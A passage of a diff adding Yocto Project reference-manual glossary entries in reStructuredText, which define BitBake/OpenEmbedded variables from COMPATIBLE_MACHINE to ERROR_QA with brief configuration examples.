+      parsing speed since the build system skips parsing recipes not
+      compatible with the current system.
+
+   :term:`COMPATIBLE_MACHINE`
+      A regular expression that resolves to one or more target machines
+      with which a recipe is compatible. The regular expression is matched
+      against :term:`MACHINEOVERRIDES`. You can use
+      the variable to stop recipes from being built for machines with which
+      the recipes are not compatible. Stopping these builds is particularly
+      useful with kernels. The variable also helps to increase parsing
+      speed since the build system skips parsing recipes not compatible
+      with the current machine.
+
+   :term:`COMPLEMENTARY_GLOB`
+      Defines wildcards to match when installing a list of complementary
+      packages for all the packages explicitly (or implicitly) installed in
+      an image.
+
+      .. note::
+
+         The ``COMPLEMENTARY_GLOB`` variable uses Unix filename pattern matching
+         (`fnmatch <https://docs.python.org/3/library/fnmatch.html#module-fnmatch>`__),
+         which is similar to the Unix style pathname pattern expansion
+         (`glob <https://docs.python.org/3/library/glob.html>`__).
+
+      The resulting list of complementary packages is associated with an
+      item that can be added to
+      :term:`IMAGE_FEATURES`. An example usage of
+      this is the "dev-pkgs" item that when added to ``IMAGE_FEATURES``
+      will install -dev packages (containing headers and other development
+      files) for every package in the image.
+
+      To add a new feature item pointing to a wildcard, use a variable flag
+      to specify the feature item name and use the value to specify the
+      wildcard. Here is an example:
+      ::
+
+         COMPLEMENTARY_GLOB[dev-pkgs] = '*-dev'
+
+   :term:`COMPONENTS_DIR`
+      Stores sysroot components for each recipe. The OpenEmbedded build
+      system uses ``COMPONENTS_DIR`` when constructing recipe-specific
+      sysroots for other recipes.
+
+      The default is
+      "``${``\ :term:`STAGING_DIR`\ ``}-components``."
+      (i.e.
+      "``${``\ :term:`TMPDIR`\ ``}/sysroots-components``").
+
+   :term:`CONF_VERSION`
+      Tracks the version of the local configuration file (i.e.
+      ``local.conf``). The value for ``CONF_VERSION`` increments each time
+      ``build/conf/`` compatibility changes.
+
+   :term:`CONFFILES`
+      Identifies editable or configurable files that are part of a package.
+      If the Package Management System (PMS) is being used to update
+      packages on the target system, it is possible that configuration
+      files you have changed after the original installation and that you
+      now want to remain unchanged are overwritten. In other words,
+      editable files might exist in the package that you do not want reset
+      as part of the package update process. You can use the ``CONFFILES``
+      variable to list the files in the package that you wish to prevent
+      the PMS from overwriting during this update process.
+
+      To use the ``CONFFILES`` variable, provide a package name override
+      that identifies the resulting package. Then, provide a
+      space-separated list of files. Here is an example:
+      ::
+
+         CONFFILES_${PN} += "${sysconfdir}/file1 \
+             ${sysconfdir}/file2 ${sysconfdir}/file3"
+
+      A relationship exists between the ``CONFFILES`` and ``FILES``
+      variables. The files listed within ``CONFFILES`` must be a subset of
+      the files listed within ``FILES``. Because the configuration files
+      you provide with ``CONFFILES`` are simply being identified so that
+      the PMS will not overwrite them, it makes sense that the files must
+      already be included as part of the package through the ``FILES``
+      variable.
+
+      .. note::
+
+         When specifying paths as part of the ``CONFFILES`` variable, it is
+         good practice to use appropriate path variables.
+         For example, ``${sysconfdir}`` rather than ``/etc`` or ``${bindir}``
+         rather than ``/usr/bin``. You can find a list of these variables at
+         the top of the ``meta/conf/bitbake.conf`` file in the
+         :term:`Source Directory`.
+
+   :term:`CONFIG_INITRAMFS_SOURCE`
+      Identifies the initial RAM filesystem (initramfs) source files. The
+      OpenEmbedded build system receives and uses this kernel Kconfig
+      variable as an environment variable. By default, the variable is set
+      to null ("").
+
+      The ``CONFIG_INITRAMFS_SOURCE`` can be either a single cpio archive
+      with a ``.cpio`` suffix or a space-separated list of directories and
+      files for building the initramfs image. A cpio archive should contain
+      a filesystem archive to be used as an initramfs image. Directories
+      should contain a filesystem layout to be included in the initramfs
+      image. Files should contain entries according to the format described
+      by the ``usr/gen_init_cpio`` program in the kernel tree.
+
+      If you specify multiple directories and files, the initramfs image
+      will be the aggregate of all of them.
+
+      For information on creating an initramfs, see the
+      ":ref:`building-an-initramfs-image`" section
+      in the Yocto Project Development Tasks Manual.
+
+   :term:`CONFIG_SITE`
+      A list of files that contains ``autoconf`` test results relevant to
+      the current build. This variable is used by the Autotools utilities
+      when running ``configure``.
+
+   :term:`CONFIGURE_FLAGS`
+      The minimal arguments for GNU configure.
+
+   :term:`CONFLICT_DISTRO_FEATURES`
+      When inheriting the
+      :ref:`features_check <ref-classes-features_check>`
+      class, this variable identifies distribution features that would be
+      in conflict should the recipe be built. In other words, if the
+      ``CONFLICT_DISTRO_FEATURES`` variable lists a feature that also
+      appears in ``DISTRO_FEATURES`` within the current configuration, then
+      the recipe will be skipped, and if the build system attempts to build
+      the recipe then an error will be triggered.
+
+   :term:`COPYLEFT_LICENSE_EXCLUDE`
+      A space-separated list of licenses to exclude from the source
+      archived by the :ref:`archiver <ref-classes-archiver>` class. In
+      other words, if a license in a recipe's
+      :term:`LICENSE` value is in the value of
+      ``COPYLEFT_LICENSE_EXCLUDE``, then its source is not archived by the
+      class.
+
+      .. note::
+
+         The ``COPYLEFT_LICENSE_EXCLUDE`` variable takes precedence over the
+         :term:`COPYLEFT_LICENSE_INCLUDE` variable.
+
+      The default value, which is "CLOSED Proprietary", for
+      ``COPYLEFT_LICENSE_EXCLUDE`` is set by the
+      :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+      is inherited by the ``archiver`` class.
+
+   :term:`COPYLEFT_LICENSE_INCLUDE`
+      A space-separated list of licenses to include in the source archived
+      by the :ref:`archiver <ref-classes-archiver>` class. In other
+      words, if a license in a recipe's :term:`LICENSE`
+      value is in the value of ``COPYLEFT_LICENSE_INCLUDE``, then its
+      source is archived by the class.
+
+      The default value is set by the
+      :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+      is inherited by the ``archiver`` class. The default value includes
+      "GPL*", "LGPL*", and "AGPL*".
+
+   :term:`COPYLEFT_PN_EXCLUDE`
+      A list of recipes to exclude in the source archived by the
+      :ref:`archiver <ref-classes-archiver>` class. The
+      ``COPYLEFT_PN_EXCLUDE`` variable overrides the license inclusion and
+      exclusion caused through the
+      :term:`COPYLEFT_LICENSE_INCLUDE` and
+      :term:`COPYLEFT_LICENSE_EXCLUDE`
+      variables, respectively.
+
+      The default value, which is "" indicating to not explicitly exclude
+      any recipes by name, for ``COPYLEFT_PN_EXCLUDE`` is set by the
+      :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+      is inherited by the ``archiver`` class.
+
+   :term:`COPYLEFT_PN_INCLUDE`
+      A list of recipes to include in the source archived by the
+      :ref:`archiver <ref-classes-archiver>` class. The
+      ``COPYLEFT_PN_INCLUDE`` variable overrides the license inclusion and
+      exclusion caused through the
+      :term:`COPYLEFT_LICENSE_INCLUDE` and
+      :term:`COPYLEFT_LICENSE_EXCLUDE`
+      variables, respectively.
+
+      The default value, which is "" indicating to not explicitly include
+      any recipes by name, for ``COPYLEFT_PN_INCLUDE`` is set by the
+      :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+      is inherited by the ``archiver`` class.
+
+   :term:`COPYLEFT_RECIPE_TYPES`
+      A space-separated list of recipe types to include in the source
+      archived by the :ref:`archiver <ref-classes-archiver>` class.
+      Recipe types are ``target``, ``native``, ``nativesdk``, ``cross``,
+      ``crosssdk``, and ``cross-canadian``.
+
+      The default value, which is "target*", for ``COPYLEFT_RECIPE_TYPES``
+      is set by the :ref:`copyleft_filter <ref-classes-copyleft_filter>`
+      class, which is inherited by the ``archiver`` class.
+
+   :term:`COPY_LIC_DIRS`
+      If set to "1" along with the
+      :term:`COPY_LIC_MANIFEST` variable, the
+      OpenEmbedded build system copies into the image the license files,
+      which are located in ``/usr/share/common-licenses``, for each
+      package. The license files are placed in directories within the image
+      itself during build time.
+
+      .. note::
+
+         The ``COPY_LIC_DIRS`` does not offer a path for adding licenses for
+         newly installed packages to an image, which might be most suitable for
+         read-only filesystems that cannot be upgraded. See the
+         :term:`LICENSE_CREATE_PACKAGE` variable for additional information.
+         You can also reference the ":ref:`dev-manual/dev-manual-common-tasks:providing license text`"
+         section in the Yocto Project Development Tasks Manual for
+         information on providing license text.
+
+   :term:`COPY_LIC_MANIFEST`
+      If set to "1", the OpenEmbedded build system copies the license
+      manifest for the image to
+      ``/usr/share/common-licenses/license.manifest`` within the image
+      itself during build time.
+
+      .. note::
+
+         The ``COPY_LIC_MANIFEST`` does not offer a path for adding licenses for
+         newly installed packages to an image, which might be most suitable for
+         read-only filesystems that cannot be upgraded. See the
+         :term:`LICENSE_CREATE_PACKAGE` variable for additional information.
+         You can also reference the ":ref:`dev-manual/dev-manual-common-tasks:providing license text`"
+         section in the Yocto Project Development Tasks Manual for
+         information on providing license text.
+
+   :term:`CORE_IMAGE_EXTRA_INSTALL`
+      Specifies the list of packages to be added to the image. You should
+      only set this variable in the ``local.conf`` configuration file found
+      in the :term:`Build Directory`.
+
+      This variable replaces ``POKY_EXTRA_INSTALL``, which is no longer
+      supported.
+
+   :term:`COREBASE`
+      Specifies the parent directory of the OpenEmbedded-Core Metadata
+      layer (i.e. ``meta``).
+
+      It is an important distinction that ``COREBASE`` points to the parent
+      of this layer and not the layer itself. Consider an example where you
+      have cloned the Poky Git repository and retained the ``poky`` name
+      for your local copy of the repository. In this case, ``COREBASE``
+      points to the ``poky`` folder because it is the parent directory of
+      the ``poky/meta`` layer.
+
+   :term:`COREBASE_FILES`
+      Lists files from the :term:`COREBASE` directory that
+      should be copied other than the layers listed in the
+      ``bblayers.conf`` file. The ``COREBASE_FILES`` variable exists for
+      the purpose of copying metadata from the OpenEmbedded build system
+      into the extensible SDK.
+
+      Explicitly listing files in ``COREBASE`` is needed because it
+      typically contains build directories and other files that should not
+      normally be copied into the extensible SDK. Consequently, the value
+      of ``COREBASE_FILES`` is used in order to only copy the files that
+      are actually needed.
+
+   :term:`CPP`
+      The minimal command and arguments used to run the C preprocessor.
+
+   :term:`CPPFLAGS`
+      Specifies the flags to pass to the C pre-processor (i.e. to both the
+      C and the C++ compilers). This variable is exported to an environment
+      variable and thus made visible to the software being built during the
+      compilation step.
+
+      Default initialization for ``CPPFLAGS`` varies depending on what is
+      being built:
+
+      -  :term:`TARGET_CPPFLAGS` when building for
+         the target
+
+      -  :term:`BUILD_CPPFLAGS` when building for the
+         build host (i.e. ``-native``)
+
+      -  :term:`BUILDSDK_CPPFLAGS` when building
+         for an SDK (i.e. ``nativesdk-``)
+
+   :term:`CROSS_COMPILE`
+      The toolchain binary prefix for the target tools. The
+      ``CROSS_COMPILE`` variable is the same as the
+      :term:`TARGET_PREFIX` variable.
+
+      .. note::
+
+         The OpenEmbedded build system sets the ``CROSS_COMPILE``
+         variable only in certain contexts (e.g. when building for kernel
+         and kernel module recipes).
+
+   :term:`CVSDIR`
+      The directory in which files checked out under the CVS system are
+      stored.
+
+   :term:`CXX`
+      The minimal command and arguments used to run the C++ compiler.
+
+   :term:`CXXFLAGS`
+      Specifies the flags to pass to the C++ compiler. This variable is
+      exported to an environment variable and thus made visible to the
+      software being built during the compilation step.
+
+      Default initialization for ``CXXFLAGS`` varies depending on what is
+      being built:
+
+      -  :term:`TARGET_CXXFLAGS` when building for
+         the target
+
+      -  :term:`BUILD_CXXFLAGS` when building for the
+         build host (i.e. ``-native``)
+
+      -  :term:`BUILDSDK_CXXFLAGS` when building
+         for an SDK (i.e. ``nativesdk-``)
+
+   :term:`D`
+      The destination directory. The location in the :term:`Build Directory`
+      where components are installed by the
+      :ref:`ref-tasks-install` task. This location defaults
+      to:
+      ::
+
+         ${WORKDIR}/image
+
+      .. note::
+
+         Tasks that read from or write to this directory should run under
+         :ref:`fakeroot <overview-manual/overview-manual-concepts:fakeroot and pseudo>`.
+
+   :term:`DATE`
+      The date the build was started. Dates appear using the year, month,
+      and day (YMD) format (e.g. "20150209" for February 9th, 2015).
+
+   :term:`DATETIME`
+      The date and time on which the current build started. The format is
+      suitable for timestamps.
+
+   :term:`DEBIAN_NOAUTONAME`
+      When the :ref:`debian <ref-classes-debian>` class is inherited,
+      which is the default behavior, ``DEBIAN_NOAUTONAME`` specifies a
+      particular package should not be renamed according to Debian library
+      package naming. You must use the package name as an override when you
+      set this variable. Here is an example from the ``fontconfig`` recipe:
+      ::
+
+         DEBIAN_NOAUTONAME_fontconfig-utils = "1"
+
+   :term:`DEBIANNAME`
+      When the :ref:`debian <ref-classes-debian>` class is inherited,
+      which is the default behavior, ``DEBIANNAME`` allows you to override
+      the library name for an individual package. Overriding the library
+      name in these cases is rare. You must use the package name as an
+      override when you set this variable. Here is an example from the
+      ``dbus`` recipe:
+      ::
+
+         DEBIANNAME_${PN} = "dbus-1"
+
+   :term:`DEBUG_BUILD`
+      Specifies to build packages with debugging information. This
+      influences the value of the ``SELECTED_OPTIMIZATION`` variable.
+
+   :term:`DEBUG_OPTIMIZATION`
+      The options to pass in ``TARGET_CFLAGS`` and ``CFLAGS`` when
+      compiling a system for debugging. This variable defaults to "-O
+      -fno-omit-frame-pointer ${DEBUG_FLAGS} -pipe".
+
+   :term:`DEFAULT_PREFERENCE`
+      Specifies a weak bias for recipe selection priority.
+
+      The most common usage of this is variable is to set it to "-1" within
+      a recipe for a development version of a piece of software. Using the
+      variable in this way causes the stable version of the recipe to build
+      by default in the absence of ``PREFERRED_VERSION`` being used to
+      build the development version.
+
+      .. note::
+
+         The bias provided by ``DEFAULT_PREFERENCE`` is weak and is overridden
+         by :term:`BBFILE_PRIORITY` if that variable is different between two
+         layers that contain different versions of the same recipe.
+
+   :term:`DEFAULTTUNE`
+      The default CPU and Application Binary Interface (ABI) tunings (i.e.
+      the "tune") used by the OpenEmbedded build system. The
+      ``DEFAULTTUNE`` helps define
+      :term:`TUNE_FEATURES`.
+
+      The default tune is either implicitly or explicitly set by the
+      machine (:term:`MACHINE`). However, you can override
+      the setting using available tunes as defined with
+      :term:`AVAILTUNES`.
+
+   :term:`DEPENDS`
+      Lists a recipe's build-time dependencies. These are dependencies on
+      other recipes whose contents (e.g. headers and shared libraries) are
+      needed by the recipe at build time.
+
+      As an example, consider a recipe ``foo`` that contains the following
+      assignment:
+      ::
+
+          DEPENDS = "bar"
+
+      The practical effect of the previous
+      assignment is that all files installed by bar will be available in
+      the appropriate staging sysroot, given by the
+      :term:`STAGING_DIR* <STAGING_DIR>` variables, by the time the
+      :ref:`ref-tasks-configure` task for ``foo`` runs.
+      This mechanism is implemented by having ``do_configure`` depend on
+      the :ref:`ref-tasks-populate_sysroot` task of
+      each recipe listed in ``DEPENDS``, through a
+      ``[``\ :ref:`deptask <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]``
+      declaration in the :ref:`base <ref-classes-base>` class.
+
+      .. note::
+
+         It seldom is necessary to reference, for example, ``STAGING_DIR_HOST``
+         explicitly. The standard classes and build-related variables are
+         configured to automatically use the appropriate staging sysroots.
+
+      As another example, ``DEPENDS`` can also be used to add utilities
+      that run on the build machine during the build. For example, a recipe
+      that makes use of a code generator built by the recipe ``codegen``
+      might have the following:
+      ::
+
+         DEPENDS = "codegen-native"
+
+      For more
+      information, see the :ref:`native <ref-classes-native>` class and
+      the :term:`EXTRANATIVEPATH` variable.
+
+      .. note::
+
+         -  ``DEPENDS`` is a list of recipe names. Or, to be more precise,
+            it is a list of :term:`PROVIDES` names, which
+            usually match recipe names. Putting a package name such as
+            "foo-dev" in ``DEPENDS`` does not make sense. Use "foo"
+            instead, as this will put files from all the packages that make
+            up ``foo``, which includes those from ``foo-dev``, into the
+            sysroot.
+
+         -  One recipe having another recipe in ``DEPENDS`` does not by
+            itself add any runtime dependencies between the packages
+            produced by the two recipes. However, as explained in the
+            ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+            section in the Yocto Project Overview and Concepts Manual,
+            runtime dependencies will often be added automatically, meaning
+            ``DEPENDS`` alone is sufficient for most recipes.
+
+         -  Counterintuitively, ``DEPENDS`` is often necessary even for
+            recipes that install precompiled components. For example, if
+            ``libfoo`` is a precompiled library that links against
+            ``libbar``, then linking against ``libfoo`` requires both
+            ``libfoo`` and ``libbar`` to be available in the sysroot.
+            Without a ``DEPENDS`` from the recipe that installs ``libfoo``
+            to the recipe that installs ``libbar``, other recipes might
+            fail to link against ``libfoo``.
+
+      For information on runtime dependencies, see the
+      :term:`RDEPENDS` variable. You can also see the
+      ":ref:`Tasks <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:tasks>`" and
+      ":ref:`Dependencies <bitbake:bitbake-user-manual/bitbake-user-manual-execution:dependencies>`" sections in the
+      BitBake User Manual for additional information on tasks and
+      dependencies.
+
+   :term:`DEPLOY_DIR`
+      Points to the general area that the OpenEmbedded build system uses to
+      place images, packages, SDKs, and other output files that are ready
+      to be used outside of the build system. By default, this directory
+      resides within the :term:`Build Directory` as
+      ``${TMPDIR}/deploy``.
+
+      For more information on the structure of the Build Directory, see
+      ":ref:`ref-manual/ref-structure:the build directory - \`\`build/\`\``" section.
+      For more detail on the contents of the ``deploy`` directory, see the
+      ":ref:`Images <images-dev-environment>`", ":ref:`Package
+      Feeds <package-feeds-dev-environment>`", and
+      ":ref:`sdk-dev-environment`" sections all in the
+      Yocto Project Overview and Concepts Manual.
+
+   :term:`DEPLOY_DIR_DEB`
+      Points to the area that the OpenEmbedded build system uses to place
+      Debian packages that are ready to be used outside of the build
+      system. This variable applies only when
+      :term:`PACKAGE_CLASSES` contains
+      "package_deb".
+
+      The BitBake configuration file initially defines the
+      ``DEPLOY_DIR_DEB`` variable as a sub-folder of
+      :term:`DEPLOY_DIR`:
+      ::
+
+         DEPLOY_DIR_DEB = "${DEPLOY_DIR}/deb"
+
+      The :ref:`package_deb <ref-classes-package_deb>` class uses the
+      ``DEPLOY_DIR_DEB`` variable to make sure the
+      :ref:`ref-tasks-package_write_deb` task
+      writes Debian packages into the appropriate folder. For more
+      information on how packaging works, see the ":ref:`Package
+      Feeds <package-feeds-dev-environment>`" section
+      in the Yocto Project Overview and Concepts Manual.
+
+   :term:`DEPLOY_DIR_IMAGE`
+      Points to the area that the OpenEmbedded build system uses to place
+      images and other associated output files that are ready to be
+      deployed onto the target machine. The directory is machine-specific
+      as it contains the ``${MACHINE}`` name. By default, this directory
+      resides within the :term:`Build Directory` as
+      ``${DEPLOY_DIR}/images/${MACHINE}/``.
+
+      For more information on the structure of the Build Directory, see
+      ":ref:`ref-manual/ref-structure:the build directory - \`\`build/\`\``" section.
+      For more detail on the contents of the ``deploy`` directory, see the
+      ":ref:`Images <images-dev-environment>`" and
+      ":ref:`sdk-dev-environment`" sections both in
+      the Yocto Project Overview and Concepts Manual.
+
+   :term:`DEPLOY_DIR_IPK`
+      Points to the area that the OpenEmbedded build system uses to place
+      IPK packages that are ready to be used outside of the build system.
+      This variable applies only when
+      :term:`PACKAGE_CLASSES` contains
+      "package_ipk".
+
+      The BitBake configuration file initially defines this variable as a
+      sub-folder of :term:`DEPLOY_DIR`:
+      ::
+
+         DEPLOY_DIR_IPK = "${DEPLOY_DIR}/ipk"
+
+      The :ref:`package_ipk <ref-classes-package_ipk>` class uses the
+      ``DEPLOY_DIR_IPK`` variable to make sure the
+      :ref:`ref-tasks-package_write_ipk` task
+      writes IPK packages into the appropriate folder. For more information
+      on how packaging works, see the ":ref:`Package
+      Feeds <package-feeds-dev-environment>`" section
+      in the Yocto Project Overview and Concepts Manual.
+
+   :term:`DEPLOY_DIR_RPM`
+      Points to the area that the OpenEmbedded build system uses to place
+      RPM packages that are ready to be used outside of the build system.
+      This variable applies only when
+      :term:`PACKAGE_CLASSES` contains
+      "package_rpm".
+
+      The BitBake configuration file initially defines this variable as a
+      sub-folder of :term:`DEPLOY_DIR`:
+      ::
+
+         DEPLOY_DIR_RPM = "${DEPLOY_DIR}/rpm"
+
+      The :ref:`package_rpm <ref-classes-package_rpm>` class uses the
+      ``DEPLOY_DIR_RPM`` variable to make sure the
+      :ref:`ref-tasks-package_write_rpm` task
+      writes RPM packages into the appropriate folder. For more information
+      on how packaging works, see the ":ref:`Package
+      Feeds <package-feeds-dev-environment>`" section
+      in the Yocto Project Overview and Concepts Manual.
+
+   :term:`DEPLOY_DIR_TAR`
+      Points to the area that the OpenEmbedded build system uses to place
+      tarballs that are ready to be used outside of the build system. This
+      variable applies only when
+      :term:`PACKAGE_CLASSES` contains
+      "package_tar".
+
+      The BitBake configuration file initially defines this variable as a
+      sub-folder of :term:`DEPLOY_DIR`:
+      ::
+
+         DEPLOY_DIR_TAR = "${DEPLOY_DIR}/tar"
+
+      The :ref:`package_tar <ref-classes-package_tar>` class uses the
+      ``DEPLOY_DIR_TAR`` variable to make sure the
+      :ref:`ref-tasks-package_write_tar` task
+      writes TAR packages into the appropriate folder. For more information
+      on how packaging works, see the ":ref:`Package
+      Feeds <package-feeds-dev-environment>`" section
+      in the Yocto Project Overview and Concepts Manual.
+
+   :term:`DEPLOYDIR`
+      When inheriting the :ref:`deploy <ref-classes-deploy>` class, the
+      ``DEPLOYDIR`` points to a temporary work area for deployed files that
+      is set in the ``deploy`` class as follows:
+      ::
+
+         DEPLOYDIR = "${WORKDIR}/deploy-${PN}"
+
+      Recipes inheriting the ``deploy`` class should copy files to be
+      deployed into ``DEPLOYDIR``, and the class will take care of copying
+      them into :term:`DEPLOY_DIR_IMAGE`
+      afterwards.
+
+   :term:`DESCRIPTION`
+      The package description used by package managers. If not set,
+      ``DESCRIPTION`` takes the value of the :term:`SUMMARY`
+      variable.
+
+   :term:`DISTRO`
+      The short name of the distribution. For information on the long name
+      of the distribution, see the :term:`DISTRO_NAME`
+      variable.
+
+      The ``DISTRO`` variable corresponds to a distribution configuration
+      file whose root name is the same as the variable's argument and whose
+      filename extension is ``.conf``. For example, the distribution
+      configuration file for the Poky distribution is named ``poky.conf``
+      and resides in the ``meta-poky/conf/distro`` directory of the
+      :term:`Source Directory`.
+
+      Within that ``poky.conf`` file, the ``DISTRO`` variable is set as
+      follows:
+      ::
+
+         DISTRO = "poky"
+
+      Distribution configuration files are located in a ``conf/distro``
+      directory within the :term:`Metadata` that contains the
+      distribution configuration. The value for ``DISTRO`` must not contain
+      spaces, and is typically all lower-case.
+
+      .. note::
+
+         If the ``DISTRO`` variable is blank, a set of default configurations
+         are used, which are specified within
+         ``meta/conf/distro/defaultsetup.conf`` also in the Source Directory.
+
+   :term:`DISTRO_CODENAME`
+      Specifies a codename for the distribution being built.
+
+   :term:`DISTRO_EXTRA_RDEPENDS`
+      Specifies a list of distro-specific packages to add to all images.
+      This variable takes affect through ``packagegroup-base`` so the
+      variable only really applies to the more full-featured images that
+      include ``packagegroup-base``. You can use this variable to keep
+      distro policy out of generic images. As with all other distro
+      variables, you set this variable in the distro ``.conf`` file.
+
+   :term:`DISTRO_EXTRA_RRECOMMENDS`
+      Specifies a list of distro-specific packages to add to all images if
+      the packages exist. The packages might not exist or be empty (e.g.
+      kernel modules). The list of packages are automatically installed but
+      you can remove them.
+
+   :term:`DISTRO_FEATURES`
+      The software support you want in your distribution for various
+      features. You define your distribution features in the distribution
+      configuration file.
+
+      In most cases, the presence or absence of a feature in
+      ``DISTRO_FEATURES`` is translated to the appropriate option supplied
+      to the configure script during the
+      :ref:`ref-tasks-configure` task for recipes that
+      optionally support the feature. For example, specifying "x11" in
+      ``DISTRO_FEATURES``, causes every piece of software built for the
+      target that can optionally support X11 to have its X11 support
+      enabled.
+
+      Two more examples are Bluetooth and NFS support. For a more complete
+      list of features that ships with the Yocto Project and that you can
+      provide with this variable, see the ":ref:`ref-features-distro`" section.
+
+   :term:`DISTRO_FEATURES_BACKFILL`
+      Features to be added to ``DISTRO_FEATURES`` if not also present in
+      ``DISTRO_FEATURES_BACKFILL_CONSIDERED``.
+
+      This variable is set in the ``meta/conf/bitbake.conf`` file. It is
+      not intended to be user-configurable. It is best to just reference
+      the variable to see which distro features are being backfilled for
+      all distro configurations. See the ":ref:`ref-features-backfill`" section
+      for more information.
+
+   :term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+      Features from ``DISTRO_FEATURES_BACKFILL`` that should not be
+      backfilled (i.e. added to ``DISTRO_FEATURES``) during the build. See
+      the ":ref:`ref-features-backfill`" section for more information.
+
+   :term:`DISTRO_FEATURES_DEFAULT`
+      A convenience variable that gives you the default list of distro
+      features with the exception of any features specific to the C library
+      (``libc``).
+
+      When creating a custom distribution, you might find it useful to be
+      able to reuse the default
+      :term:`DISTRO_FEATURES` options without the
+      need to write out the full set. Here is an example that uses
+      ``DISTRO_FEATURES_DEFAULT`` from a custom distro configuration file:
+      ::
+
+         DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} myfeature"
+
+   :term:`DISTRO_FEATURES_FILTER_NATIVE`
+      Specifies a list of features that if present in the target
+      :term:`DISTRO_FEATURES` value should be
+      included in ``DISTRO_FEATURES`` when building native recipes. This
+      variable is used in addition to the features filtered using the
+      :term:`DISTRO_FEATURES_NATIVE`
+      variable.
+
+   :term:`DISTRO_FEATURES_FILTER_NATIVESDK`
+      Specifies a list of features that if present in the target
+      :term:`DISTRO_FEATURES` value should be
+      included in ``DISTRO_FEATURES`` when building nativesdk recipes. This
+      variable is used in addition to the features filtered using the
+      :term:`DISTRO_FEATURES_NATIVESDK`
+      variable.
+
+   :term:`DISTRO_FEATURES_NATIVE`
+      Specifies a list of features that should be included in
+      :term:`DISTRO_FEATURES` when building native
+      recipes. This variable is used in addition to the features filtered
+      using the
+      :term:`DISTRO_FEATURES_FILTER_NATIVE`
+      variable.
+
+   :term:`DISTRO_FEATURES_NATIVESDK`
+      Specifies a list of features that should be included in
+      :term:`DISTRO_FEATURES` when building
+      nativesdk recipes. This variable is used in addition to the features
+      filtered using the
+      :term:`DISTRO_FEATURES_FILTER_NATIVESDK`
+      variable.
+
+   :term:`DISTRO_NAME`
+      The long name of the distribution. For information on the short name
+      of the distribution, see the :term:`DISTRO` variable.
+
+      The ``DISTRO_NAME`` variable corresponds to a distribution
+      configuration file whose root name is the same as the variable's
+      argument and whose filename extension is ``.conf``. For example, the
+      distribution configuration file for the Poky distribution is named
+      ``poky.conf`` and resides in the ``meta-poky/conf/distro`` directory
+      of the :term:`Source Directory`.
+
+      Within that ``poky.conf`` file, the ``DISTRO_NAME`` variable is set
+      as follows:
+      ::
+
+         DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
+
+      Distribution configuration files are located in a ``conf/distro``
+      directory within the :term:`Metadata` that contains the
+      distribution configuration.
+
+      .. note::
+
+         If the ``DISTRO_NAME`` variable is blank, a set of default
+         configurations are used, which are specified within
+         ``meta/conf/distro/defaultsetup.conf`` also in the Source Directory.
+
+   :term:`DISTRO_VERSION`
+      The version of the distribution.
+
+   :term:`DISTROOVERRIDES`
+      A colon-separated list of overrides specific to the current
+      distribution. By default, this list includes the value of
+      :term:`DISTRO`.
+
+      You can extend ``DISTROOVERRIDES`` to add extra overrides that should
+      apply to the distribution.
+
+      The underlying mechanism behind ``DISTROOVERRIDES`` is simply that it
+      is included in the default value of
+      :term:`OVERRIDES`.
+
+   :term:`DL_DIR`
+      The central download directory used by the build process to store
+      downloads. By default, ``DL_DIR`` gets files suitable for mirroring
+      for everything except Git repositories. If you want tarballs of Git
+      repositories, use the
+      :term:`BB_GENERATE_MIRROR_TARBALLS`
+      variable.
+
+      You can set this directory by defining the ``DL_DIR`` variable in the
+      ``conf/local.conf`` file. This directory is self-maintaining and you
+      should not have to touch it. By default, the directory is
+      ``downloads`` in the :term:`Build Directory`.
+      ::
+
+         #DL_DIR ?= "${TOPDIR}/downloads"
+
+      To specify a different download directory,
+      simply remove the comment from the line and provide your directory.
+
+      During a first build, the system downloads many different source code
+      tarballs from various upstream projects. Downloading can take a
+      while, particularly if your network connection is slow. Tarballs are
+      all stored in the directory defined by ``DL_DIR`` and the build
+      system looks there first to find source tarballs.
+
+      .. note::
+
+         When wiping and rebuilding, you can preserve this directory to
+         speed up this part of subsequent builds.
+
+      You can safely share this directory between multiple builds on the
+      same development machine. For additional information on how the build
+      process gets source files when working behind a firewall or proxy
+      server, see this specific question in the ":doc:`faq`"
+      chapter. You can also refer to the
+      ":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+      Wiki page.
+
+   :term:`DOC_COMPRESS`
+      When inheriting the :ref:`compress_doc <ref-classes-compress_doc>`
+      class, this variable sets the compression policy used when the
+      OpenEmbedded build system compresses man pages and info pages. By
+      default, the compression method used is gz (gzip). Other policies
+      available are xz and bz2.
+
+      For information on policies and on how to use this variable, see the
+      comments in the ``meta/classes/compress_doc.bbclass`` file.
+
+   :term:`EFI_PROVIDER`
+      When building bootable images (i.e. where ``hddimg``, ``iso``, or
+      ``wic.vmdk`` is in :term:`IMAGE_FSTYPES`), the
+      ``EFI_PROVIDER`` variable specifies the EFI bootloader to use. The
+      default is "grub-efi", but "systemd-boot" can be used instead.
+
+      See the :ref:`systemd-boot <ref-classes-systemd-boot>` and
+      :ref:`image-live <ref-classes-image-live>` classes for more
+      information.
+
+   :term:`ENABLE_BINARY_LOCALE_GENERATION`
+      Variable that controls which locales for ``glibc`` are generated
+      during the build (useful if the target device has 64Mbytes of RAM or
+      less).
+
+   :term:`ERR_REPORT_DIR`
+      When used with the :ref:`report-error <ref-classes-report-error>`
+      class, specifies the path used for storing the debug files created by
+      the :ref:`error reporting
+      tool <dev-manual/dev-manual-common-tasks:using the error reporting tool>`, which
+      allows you to submit build errors you encounter to a central
+      database. By default, the value of this variable is
+      ``${``\ :term:`LOG_DIR`\ ``}/error-report``.
+
+      You can set ``ERR_REPORT_DIR`` to the path you want the error
+      reporting tool to store the debug files as follows in your
+      ``local.conf`` file:
+      ::
+
+         ERR_REPORT_DIR = "path"
+
+   :term:`ERROR_QA`
+      Specifies the quality assurance checks whose failures are reported as
+      errors by the OpenEmbedded build system. You set this variable in
+      your distribution configuration file. For a list of the checks you
+      can control with this variable, see the
+      ":ref:`insane.bbclass <ref-classes-insane>`" section.
+
